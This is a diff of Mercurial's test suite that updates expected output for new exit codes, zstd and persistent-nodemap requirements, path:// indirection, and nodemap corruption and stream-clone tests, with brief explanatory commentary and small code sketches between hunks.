fncache
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -62,15 +64,17 @@
$ cd ..
-BUG: local-to-local narrow clones should work, but don't.
+local-to-local narrow clones work
$ hg clone --narrow master narrow-via-localpeer --noupdate --include "dir/src/f10"
requesting all changes
- abort: server does not support narrow clones
- [255]
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 1 changes to 1 files
+ new changesets 5d21aaea77f8:26ce255d5b5d
$ hg tracked -R narrow-via-localpeer
- abort: repository narrow-via-localpeer not found
- [255]
+ I path:dir/src/f10
$ rm -Rf narrow-via-localpeer
narrow clone with a newline should fail
--- a/tests/test-narrow-exchange.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -105,7 +105,7 @@
remote: adding file changes
remote: transaction abort!
remote: rollback completed
- remote: abort: data/inside2/f.i@4a1aa07735e6: unknown parent (reporevlogstore !)
+ remote: abort: data/inside2/f.i@4a1aa07735e673e20c00fae80f40dc301ee30616: unknown parent (reporevlogstore !)
remote: abort: data/inside2/f/index@4a1aa07735e6: no node (reposimplestore !)
abort: stream ended unexpectedly (got 0 bytes, expected 4)
[255]
@@ -218,8 +218,8 @@
remote: adding manifests
remote: adding file changes
remote: added 1 changesets with 0 changes to 0 files (no-lfs-on !)
- remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e021835: no match found (lfs-on !)
+ remote: error: pretxnchangegroup.lfs hook raised an exception: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !)
remote: transaction abort! (lfs-on !)
remote: rollback completed (lfs-on !)
- remote: abort: data/inside2/f.i@f59b4e021835: no match found (lfs-on !)
+ remote: abort: data/inside2/f.i@f59b4e0218355383d2789196f1092abcf2262b0c: no match found (lfs-on !)
abort: stream ended unexpectedly (got 0 bytes, expected 4) (lfs-on !)
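
Both test-narrow-exchange.t hunks record the same message change: revlog errors now embed the full 40-digit hex node where they previously used the 12-digit short form. The two spellings relate trivially:

    node = bytes.fromhex('4a1aa07735e673e20c00fae80f40dc301ee30616')
    full = node.hex()         # 40 hex digits, as the messages now print
    short = node.hex()[:12]   # '4a1aa07735e6', the old short form
    assert full.startswith(short)
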
--- a/tests/test-narrow-pull.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-pull.t Tue Apr 20 11:01:06 2021 -0400
@@ -78,7 +78,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.bad hook exited with status 1
- [255]
+ [40]
$ hg id
223311e70a6f tip
@@ -147,7 +147,8 @@
$ hg clone -q --narrow ssh://user@dummy/master narrow2 --include "f1" -r 0
$ cd narrow2
$ hg pull -q -r 1
+ remote: abort: unexpected error: unable to resolve parent while packing '00manifest.i' 1 for changeset 0
transaction abort!
rollback completed
abort: pull failed on remote
- [255]
+ [100]
--- a/tests/test-narrow-shallow-merges.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-shallow-merges.t Tue Apr 20 11:01:06 2021 -0400
@@ -179,7 +179,7 @@
$ hg log -T '{if(ellipsis,"...")}{node|short} {p1node|short} {p2node|short} {desc}\n' | sort
- ...2a20009de83e 000000000000 3ac1f5779de3 outside 10
+ ...2a20009de83e 3ac1f5779de3 000000000000 outside 10
...3ac1f5779de3 bb96a08b062a 465567bdfb2d merge a/b/c/d 9
...8d874d57adea 7ef88b4dd4fa 000000000000 outside 12
...b844052e7b3b 000000000000 000000000000 outside 2c
--- a/tests/test-narrow-shallow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-shallow.t Tue Apr 20 11:01:06 2021 -0400
@@ -110,9 +110,9 @@
requesting all changes
remote: abort: depth must be positive, got 0
abort: pull failed on remote
- [255]
+ [100]
$ hg clone --narrow ssh://user@dummy/master bad --include "d2" --depth -1
requesting all changes
remote: abort: depth must be positive, got -1
abort: pull failed on remote
- [255]
+ [100]
--- a/tests/test-narrow-sparse.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-sparse.t Tue Apr 20 11:01:06 2021 -0400
@@ -61,6 +61,8 @@
fncache
generaldelta
narrowhg-experimental
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-narrow-trackedcmd.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-trackedcmd.t Tue Apr 20 11:01:06 2021 -0400
@@ -110,6 +110,8 @@
--clear whether to replace the existing narrowspec
--force-delete-local-changes forces deletion of local changes when
narrowing
+ --[no-]backup back up local changes when narrowing
+ (default: on)
--update-working-copy update working copy when the store has
changed
-e --ssh CMD specify ssh command to use
--- a/tests/test-narrow-widen.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow-widen.t Tue Apr 20 11:01:06 2021 -0400
@@ -431,7 +431,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.bad hook exited with status 1
- [255]
+ [40]
$ hg l
$ hg bookmarks
no bookmarks set
--- a/tests/test-narrow.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-narrow.t Tue Apr 20 11:01:06 2021 -0400
@@ -61,7 +61,7 @@
[255]
Names with '.' in them are OK.
- $ hg clone --narrow ssh://user@dummy/master should-work --include a/.b/c
+ $ hg clone --narrow ./master should-work --include a/.b/c
requesting all changes
adding changesets
adding manifests
@@ -492,3 +492,33 @@
searching for changes
looking for unused includes to remove
found no unused includes
+Test --no-backup
+ $ hg tracked --addinclude d0 --addinclude d2 -q
+ $ hg unbundle .hg/strip-backup/*-narrow.hg -q
+ $ rm .hg/strip-backup/*
+ $ hg tracked --auto-remove-includes --no-backup
+ comparing with ssh://user@dummy/master
+ searching for changes
+ looking for unused includes to remove
+ path:d0
+ path:d2
+ remove these unused includes (yn)? y
+ looking for local changes to affected paths
+ deleting data/d0/f.i
+ deleting data/d2/f.i
+ deleting meta/d0/00manifest.i (tree !)
+ deleting meta/d2/00manifest.i (tree !)
+ $ ls .hg/strip-backup/
+
+
+Test removing an include while concurrently modifying a file in that path
+ $ hg clone --narrow ssh://user@dummy/master narrow-concurrent-modify -q \
+ > --include d0 --include d1
+ $ cd narrow-concurrent-modify
+ $ hg --config 'hooks.pretxnopen = echo modified >> d0/f' tracked --removeinclude d0
+ comparing with ssh://user@dummy/master
+ searching for changes
+ looking for local changes to affected paths
+ deleting data/d0/f.i
+ deleting meta/d0/00manifest.i (tree !)
+ not deleting possibly dirty file d0/f
--- a/tests/test-obsolete-changeset-exchange.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-obsolete-changeset-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -158,11 +158,10 @@
list of changesets:
bec0734cd68e84477ba7fc1d13e6cff53ab70129
listing keys for "bookmarks"
- bundle2-output-bundle: "HG20", 4 parts total
+ bundle2-output-bundle: "HG20", 3 parts total
bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload
bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload
bundle2-output-part: "phase-heads" 24 bytes payload
- bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported
adding changesets
@@ -174,9 +173,7 @@
bundle2-input-part: "listkeys" (params: 1 mandatory) supported
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 39
- bundle2-input-bundle: 4 parts total
+ bundle2-input-bundle: 3 parts total
checking for updated bookmarks
updating the branch cache
added 1 changesets with 1 changes to 1 files (+1 heads)
--- a/tests/test-obsolete-distributed.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-obsolete-distributed.t Tue Apr 20 11:01:06 2021 -0400
@@ -151,12 +151,11 @@
list of changesets:
391a2bf12b1b8b05a72400ae36b26d50a091dc22
listing keys for "bookmarks"
- bundle2-output-bundle: "HG20", 5 parts total
+ bundle2-output-bundle: "HG20", 4 parts total
bundle2-output-part: "changegroup" (params: 1 mandatory 1 advisory) streamed payload
bundle2-output-part: "listkeys" (params: 1 mandatory) empty payload
bundle2-output-part: "obsmarkers" streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
- bundle2-output-part: "cache:rev-branch-cache" (advisory) streamed payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "changegroup" (params: 1 mandatory 1 advisory) supported
adding changesets
@@ -170,9 +169,7 @@
bundle2-input-part: total payload size 143
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 48
- bundle2-input-part: "cache:rev-branch-cache" (advisory) supported
- bundle2-input-part: total payload size 39
- bundle2-input-bundle: 5 parts total
+ bundle2-input-bundle: 4 parts total
checking for updated bookmarks
adding 1 changesets with 1 changes to 1 files (+1 heads)
1 new obsolescence markers
--- a/tests/test-obsolete.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-obsolete.t Tue Apr 20 11:01:06 2021 -0400
@@ -97,8 +97,10 @@
# rev p1rev p2rev start end deltastart base p1 p2 rawsize totalsize compression heads chainlen
0 -1 -1 0 59 0 0 0 0 58 58 0 1 0
1 0 -1 59 118 59 59 0 0 58 116 0 1 0
- 2 1 -1 118 193 118 118 59 0 76 192 0 1 0
- 3 1 -1 193 260 193 193 59 0 66 258 0 2 0
+ 2 1 -1 118 193 118 118 59 0 76 192 0 1 0 (no-zstd !)
+ 3 1 -1 193 260 193 193 59 0 66 258 0 2 0 (no-zstd !)
+ 2 1 -1 118 195 118 118 59 0 76 192 0 1 0 (zstd !)
+ 3 1 -1 195 262 195 195 59 0 66 258 0 2 0 (zstd !)
$ hg debugobsolete
245bde4270cd1072a27757984f9cda8ba26f08ca cdbce2fbb16313928851e97e0d85413f3f7eb77f C (Thu Jan 01 00:00:01 1970 -0002) {'user': 'test'}
@@ -1844,6 +1846,7 @@
ancestor path: file (node bc7ebe2d260cff30d2a39a130d84add36216f791)
other path: file (node b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3)
extra: ancestorlinknode = b73b8c9a4ab4da89a5a35a6f10dfb13edc84ca37
+ extra: merged = yes
We should be able to see the log (without the deleted commit, of course)
$ hg log -G
@ 0:f53e9479dce5 (draft) [tip ] first
--- a/tests/test-parse-date.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-parse-date.t Tue Apr 20 11:01:06 2021 -0400
@@ -103,43 +103,43 @@
$ hg log -d "--2"
abort: -2 must be nonnegative (see 'hg help dates')
- [255]
+ [10]
Whitespace only
$ hg log -d " "
abort: dates cannot consist entirely of whitespace
- [255]
+ [10]
Test date formats with '>' or '<' accompanied by space characters
$ hg log -d '>' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d '<' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d ' >' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d ' <' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d '> ' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d '< ' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d ' > ' --template '{date|date}\n'
abort: invalid day spec, use '>DATE'
- [255]
+ [10]
$ hg log -d ' < ' --template '{date|date}\n'
abort: invalid day spec, use '<DATE'
- [255]
+ [10]
$ hg log -d '>02/01' --template '{date|date}\n'
$ hg log -d '<02/01' --template '{date|date}\n'
--- a/tests/test-parseindex2.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-parseindex2.py Tue Apr 20 11:01:06 2021 -0400
@@ -117,8 +117,8 @@
)
-def parse_index2(data, inline):
- index, chunkcache = parsers.parse_index2(data, inline)
+def parse_index2(data, inline, revlogv2=False):
+ index, chunkcache = parsers.parse_index2(data, inline, revlogv2=revlogv2)
return list(index), chunkcache
--- a/tests/test-patchbomb.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-patchbomb.t Tue Apr 20 11:01:06 2021 -0400
@@ -2868,7 +2868,7 @@
dest#branch URIs:
$ hg email --date '1980-1-1 0:1' -n -t foo -s test -o ../t#test
- comparing with ../t
+ comparing with ../t#test
From [test]: test
this patch series consists of 1 patches.
@@ -2998,7 +2998,7 @@
bad value setting
-----------------
- $ echo 'intro=mpmwearaclownnose' >> $HGRCPATH
+ $ echo 'intro=oliviawearaclownnose' >> $HGRCPATH
single rev
@@ -3006,7 +3006,7 @@
From [test]: test
this patch series consists of 1 patches.
- warning: invalid patchbomb.intro value "mpmwearaclownnose"
+ warning: invalid patchbomb.intro value "oliviawearaclownnose"
(should be one of always, never, auto)
-f test foo
MIME-Version: 1.0
@@ -3047,7 +3047,7 @@
$ hg email --date '1980-1-1 0:1' -v -t '~foo/bar@example.com' -f 'me*@example.com' -r '10'
this patch series consists of 1 patches.
- warning: invalid patchbomb.intro value "mpmwearaclownnose"
+ warning: invalid patchbomb.intro value "oliviawearaclownnose"
(should be one of always, never, auto)
-f me*@example.com ~foo/bar@example.com
MIME-Version: 1.0
--- a/tests/test-pathconflicts-basic.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pathconflicts-basic.t Tue Apr 20 11:01:06 2021 -0400
@@ -53,7 +53,7 @@
$ hg up file
a: untracked directory conflicts with file
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up --clean file
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(activating bookmark file)
--- a/tests/test-pathconflicts-update.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-pathconflicts-update.t Tue Apr 20 11:01:06 2021 -0400
@@ -49,7 +49,7 @@
$ hg up dir
a/b: untracked file conflicts with directory
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up dir --config merge.checkunknown=warn
a/b: replacing untracked file
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -70,7 +70,7 @@
$ hg up dir
a/b: untracked file conflicts with directory
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up dir --config merge.checkunknown=warn
a/b: replacing untracked file
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -89,7 +89,7 @@
$ hg up file
a/b: untracked directory conflicts with file
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up file --config merge.checkunknown=warn
a/b: replacing untracked files in directory
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -107,7 +107,7 @@
$ hg up link
a/b: untracked directory conflicts with file
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ hg up link --config merge.checkunknown=warn
a/b: replacing untracked files in directory
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
--- a/tests/test-paths.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-paths.t Tue Apr 20 11:01:06 2021 -0400
@@ -211,3 +211,177 @@
000000000000
$ cd ..
+
+Testing path referencing other paths
+====================================
+
+basic setup
+-----------
+
+ $ ls -1
+ a
+ b
+ gpath1
+ suboptions
+ $ hg init chained_path
+ $ cd chained_path
+ $ cat << EOF > .hg/hgrc
+ > [paths]
+ > default=../a
+ > other_default=path://default
+ > path_with_branch=../branchy#foo
+ > other_branch=path://path_with_branch
+ > other_branched=path://path_with_branch#default
+ > pushdest=../push-dest
+ > pushdest:pushrev=default
+ > pushdest2=path://pushdest
+ > pushdest-overwrite=path://pushdest
+ > pushdest-overwrite:pushrev=foo
+ > EOF
+
+ $ hg init ../branchy
+ $ hg init ../push-dest
+ $ hg debugbuilddag -R ../branchy '.:base+3<base@foo+5'
+ $ hg log -G -T '{branch}\n' -R ../branchy
+ o foo
+ |
+ o foo
+ |
+ o foo
+ |
+ o foo
+ |
+ o foo
+ |
+ | o default
+ | |
+ | o default
+ | |
+ | o default
+ |/
+ o default
+
+
+ $ hg paths
+ default = $TESTTMP/a
+ gpath1 = http://hg.example.com/
+ other_branch = $TESTTMP/branchy#foo
+ other_branched = $TESTTMP/branchy#default
+ other_default = $TESTTMP/a
+ path_with_branch = $TESTTMP/branchy#foo
+ pushdest = $TESTTMP/push-dest
+ pushdest:pushrev = default
+ pushdest-overwrite = $TESTTMP/push-dest
+ pushdest-overwrite:pushrev = foo
+ pushdest2 = $TESTTMP/push-dest
+ pushdest2:pushrev = default
+
+test basic chaining
+-------------------
+
+ $ hg path other_default
+ $TESTTMP/a
+ $ hg pull default
+ pulling from $TESTTMP/a
+ no changes found
+ $ hg pull other_default
+ pulling from $TESTTMP/a
+ no changes found
+
+test inheritance of the #fragment part
+--------------------------------------
+
+ $ hg pull path_with_branch
+ pulling from $TESTTMP/branchy
+ adding changesets
+ adding manifests
+ adding file changes
+ added 6 changesets with 0 changes to 0 files
+ new changesets 1ea73414a91b:bcebb50b77de
+ (run 'hg update' to get a working copy)
+ $ hg pull other_branch
+ pulling from $TESTTMP/branchy
+ no changes found
+ $ hg pull other_branched
+ pulling from $TESTTMP/branchy
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 0 changes to 0 files (+1 heads)
+ new changesets 66f7d451a68b:2dc09a01254d
+ (run 'hg heads' to see heads)
+
+test inheritance of the suboptions
+----------------------------------
+
+ $ hg push pushdest
+ pushing to $TESTTMP/push-dest
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 0 changes to 0 files
+ $ hg push pushdest2
+ pushing to $TESTTMP/push-dest
+ searching for changes
+ no changes found
+ [1]
+ $ hg push pushdest-overwrite --new-branch
+ pushing to $TESTTMP/push-dest
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 5 changesets with 0 changes to 0 files (+1 heads)
+
+Test chaining path:// definition
+--------------------------------
+
+This is currently unsupported, but feel free to implement the necessary
+dependency detection.
+
+ $ cat << EOF >> .hg/hgrc
+ > chain_path=path://other_default
+ > EOF
+
+ $ hg id
+ 000000000000
+ $ hg path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+ $ hg pull chain_path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+
+Defining an actual cycle should always be an issue
+
+ $ cat << EOF >> .hg/hgrc
+ > rock=path://cissors
+ > cissors=path://paper
+ > paper=path://rock
+ > EOF
+
+ $ hg id
+ 000000000000
+ $ hg path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+ $ hg pull chain_path
+ abort: cannot use `path://other_default`, "other_default" is also defined as a `path://`
+ [255]
+
+Test basic error cases
+----------------------
+
+ $ cat << EOF > .hg/hgrc
+ > [paths]
+ > error-missing=path://unknown
+ > EOF
+ $ hg path
+ abort: cannot use `path://unknown`, "unknown" is not a known path
+ [255]
+ $ hg pull error-missing
+ abort: cannot use `path://unknown`, "unknown" is not a known path
+ [255]
+
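
The new test-paths.t section introduces `path://NAME` indirection: a [paths] entry can reference another entry and inherits its URL, #fragment, and sub-options, but chaining `path://` onto another `path://` entry (and hence any cycle) is rejected, as is a reference to an unknown name. A minimal resolver sketch for those error cases (hypothetical helper, fragment and sub-option inheritance omitted; not Mercurial's implementation):

    def resolve(paths, name):
        """Resolve one level of 'path://' indirection."""
        target = paths[name]
        if not target.startswith('path://'):
            return target
        ref = target[len('path://'):]
        if ref not in paths:
            raise LookupError(
                'cannot use `%s`, "%s" is not a known path' % (target, ref))
        if paths[ref].startswith('path://'):
            # this is also what rules out rock -> cissors -> paper -> rock
            raise ValueError(
                'cannot use `%s`, "%s" is also defined as a `path://`'
                % (target, ref))
        return paths[ref]

    paths = {'default': '../a', 'other_default': 'path://default',
             'chain_path': 'path://other_default'}
    print(resolve(paths, 'other_default'))   # ../a
    # resolve(paths, 'chain_path') -> '"other_default" is also defined ...'
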
--- a/tests/test-persistent-nodemap.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-persistent-nodemap.t Tue Apr 20 11:01:06 2021 -0400
@@ -2,6 +2,9 @@
Test the persistent on-disk nodemap
===================================
+
+#if no-rust
+
$ cat << EOF >> $HGRCPATH
> [format]
> use-persistent-nodemap=yes
@@ -9,6 +12,8 @@
> persistent-nodemap=yes
> EOF
+#endif
+
$ hg init test-repo --config storage.revlog.persistent-nodemap.slow-path=allow
$ cd test-repo
@@ -56,11 +61,12 @@
generaldelta: yes
share-safe: no
sparserevlog: yes
- sidedata: no
persistent-nodemap: yes
copies-sdc: no
+ revlog-v2: no
plain-cl-delta: yes
- compression: zlib
+ compression: zlib (no-zstd !)
+ compression: zstd (zstd !)
compression-level: default
$ hg debugbuilddag .+5000 --new-file
@@ -575,17 +581,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
persistent-nodemap: yes no no
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
- $ hg debugupgraderepo --run --no-backup --quiet
+ $ hg debugupgraderepo --run --no-backup
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
removed: persistent-nodemap
processed revlogs:
@@ -593,8 +601,17 @@
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ downgrading repository to not use persistent nodemap feature
+ removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob)
$ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)'
- [1]
+ 00changelog-*.nd (glob)
+ 00manifest-*.nd (glob)
+ undo.backup.00changelog.n
+ undo.backup.00manifest.n
$ hg debugnodemap --metadata
@@ -611,29 +628,42 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
persistent-nodemap: no yes no
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
- $ hg debugupgraderepo --run --no-backup --quiet
+ $ hg debugupgraderepo --run --no-backup
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
added: persistent-nodemap
+ persistent-nodemap
+ Speedup revision lookup by node id.
+
processed revlogs:
- all-filelogs
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/test-repo/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ upgrading repository to use persistent nodemap feature
+ removing temporary repository $TESTTMP/test-repo/.hg/upgrade.* (glob)
$ ls -1 .hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)'
00changelog-*.nd (glob)
00changelog.n
00manifest-*.nd (glob)
00manifest.n
+ undo.backup.00changelog.n
+ undo.backup.00manifest.n
$ hg debugnodemap --metadata
uid: * (glob)
@@ -649,7 +679,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
optimisations: re-delta-all
@@ -716,20 +747,88 @@
data-unused: 0
data-unused: 0.000%
+Test various corruption cases
+============================
+
+Missing datafile
+----------------
+
+Test behavior with a missing datafile
+
+ $ hg clone --quiet --pull test-repo corruption-test-repo
+ $ ls -1 corruption-test-repo/.hg/store/00changelog*
+ corruption-test-repo/.hg/store/00changelog-*.nd (glob)
+ corruption-test-repo/.hg/store/00changelog.d
+ corruption-test-repo/.hg/store/00changelog.i
+ corruption-test-repo/.hg/store/00changelog.n
+ $ rm corruption-test-repo/.hg/store/00changelog*.nd
+ $ hg log -R corruption-test-repo -r .
+ changeset: 5005:90d5d3ba2fc4
+ tag: tip
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: a2
+
+ $ ls -1 corruption-test-repo/.hg/store/00changelog*
+ corruption-test-repo/.hg/store/00changelog.d
+ corruption-test-repo/.hg/store/00changelog.i
+ corruption-test-repo/.hg/store/00changelog.n
+
+Truncated data file
+-------------------
+
+Test behavior with a too-short datafile
+
+rebuild the missing data
+ $ hg -R corruption-test-repo debugupdatecache
+ $ ls -1 corruption-test-repo/.hg/store/00changelog*
+ corruption-test-repo/.hg/store/00changelog-*.nd (glob)
+ corruption-test-repo/.hg/store/00changelog.d
+ corruption-test-repo/.hg/store/00changelog.i
+ corruption-test-repo/.hg/store/00changelog.n
+
+truncate the file (dd below keeps only the first 10 blocks of 1000 bytes, leaving a 10000-byte file)
+
+ $ datafilepath=`ls corruption-test-repo/.hg/store/00changelog*.nd`
+ $ f -s $datafilepath
+ corruption-test-repo/.hg/store/00changelog-*.nd: size=121088 (glob)
+ $ dd if=$datafilepath bs=1000 count=10 of=$datafilepath-tmp status=none
+ $ mv $datafilepath-tmp $datafilepath
+ $ f -s $datafilepath
+ corruption-test-repo/.hg/store/00changelog-*.nd: size=10000 (glob)
+
+Check Mercurial's reaction to this event
+
+ $ hg -R corruption-test-repo log -r . --traceback
+ changeset: 5005:90d5d3ba2fc4
+ tag: tip
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: a2
+
+
+
stream clone
-------------
+============
The persistent nodemap should exist after a streaming clone
+Simple case
+-----------
+
+No race condition
+
$ hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone --debug | egrep '00(changelog|manifest)'
adding [s] 00manifest.n (70 bytes)
- adding [s] 00manifest.i (313 KB)
- adding [s] 00manifest.d (452 KB)
adding [s] 00manifest-*.nd (118 KB) (glob)
adding [s] 00changelog.n (70 bytes)
+ adding [s] 00changelog-*.nd (118 KB) (glob)
+ adding [s] 00manifest.d (452 KB) (no-zstd !)
+ adding [s] 00manifest.d (491 KB) (zstd !)
+ adding [s] 00changelog.d (360 KB) (no-zstd !)
+ adding [s] 00changelog.d (368 KB) (zstd !)
+ adding [s] 00manifest.i (313 KB)
adding [s] 00changelog.i (313 KB)
- adding [s] 00changelog.d (360 KB)
- adding [s] 00changelog-*.nd (118 KB) (glob)
$ ls -1 stream-clone/.hg/store/ | egrep '00(changelog|manifest)(\.n|-.*\.nd)'
00changelog-*.nd (glob)
00changelog.n
@@ -742,3 +841,212 @@
data-length: 121088
data-unused: 0
data-unused: 0.000%
+
+new data appended
+-----------------
+
+Another commit happens on the server during the stream clone
+
+Set up the step-by-step stream cloning
+
+ $ HG_TEST_STREAM_WALKED_FILE_1="$TESTTMP/sync_file_walked_1"
+ $ export HG_TEST_STREAM_WALKED_FILE_1
+ $ HG_TEST_STREAM_WALKED_FILE_2="$TESTTMP/sync_file_walked_2"
+ $ export HG_TEST_STREAM_WALKED_FILE_2
+ $ HG_TEST_STREAM_WALKED_FILE_3="$TESTTMP/sync_file_walked_3"
+ $ export HG_TEST_STREAM_WALKED_FILE_3
+ $ cat << EOF >> test-repo/.hg/hgrc
+ > [extensions]
+ > steps=$RUNTESTDIR/testlib/ext-stream-clone-steps.py
+ > EOF
+
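+(Judging from the usage below: file 1 signals that the server side has listed
+the files to stream, touching file 2 lets the transfer proceed, and file 3 is
+touched once the background clone exits.) A minimal sketch of such a
+file-based wait, assuming plain polling; the real `wait-on-file` helper may
+differ in details:
+
+ $ cat << 'EOF' > wait-sketch.sh
+ > #!/bin/sh
+ > # usage: wait-sketch.sh TIMEOUT_SECONDS FILE
+ > # poll until FILE exists; give up after roughly TIMEOUT_SECONDS
+ > timeout="$1"; f="$2"; tries=0
+ > while [ ! -e "$f" ]; do
+ >     tries=$((tries + 1))
+ >     [ "$tries" -gt $((timeout * 10)) ] && exit 1
+ >     sleep 0.1
+ > done
+ > EOF
+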
+Check and record file state beforehand
+
+ $ f --size test-repo/.hg/store/00changelog*
+ test-repo/.hg/store/00changelog-*.nd: size=121088 (glob)
+ test-repo/.hg/store/00changelog.d: size=376891 (zstd !)
+ test-repo/.hg/store/00changelog.d: size=368890 (no-zstd !)
+ test-repo/.hg/store/00changelog.i: size=320384
+ test-repo/.hg/store/00changelog.n: size=70
+ $ hg -R test-repo debugnodemap --metadata | tee server-metadata.txt
+ uid: * (glob)
+ tip-rev: 5005
+ tip-node: 90d5d3ba2fc47db50f712570487cb261a68c8ffe
+ data-length: 121088
+ data-unused: 0
+ data-unused: 0.000%
+
+Prepare a commit
+
+ $ echo foo >> test-repo/foo
+ $ hg -R test-repo/ add test-repo/foo
+
+Do a mix of clone and commit at the same time so that the files listed on disk differ at actual transfer time.
+
+ $ (hg clone -U --stream --config ui.ssh="\"$PYTHON\" \"$TESTDIR/dummyssh\"" ssh://user@dummy/test-repo stream-clone-race-1 --debug 2>> clone-output | egrep '00(changelog|manifest)' >> clone-output; touch $HG_TEST_STREAM_WALKED_FILE_3) &
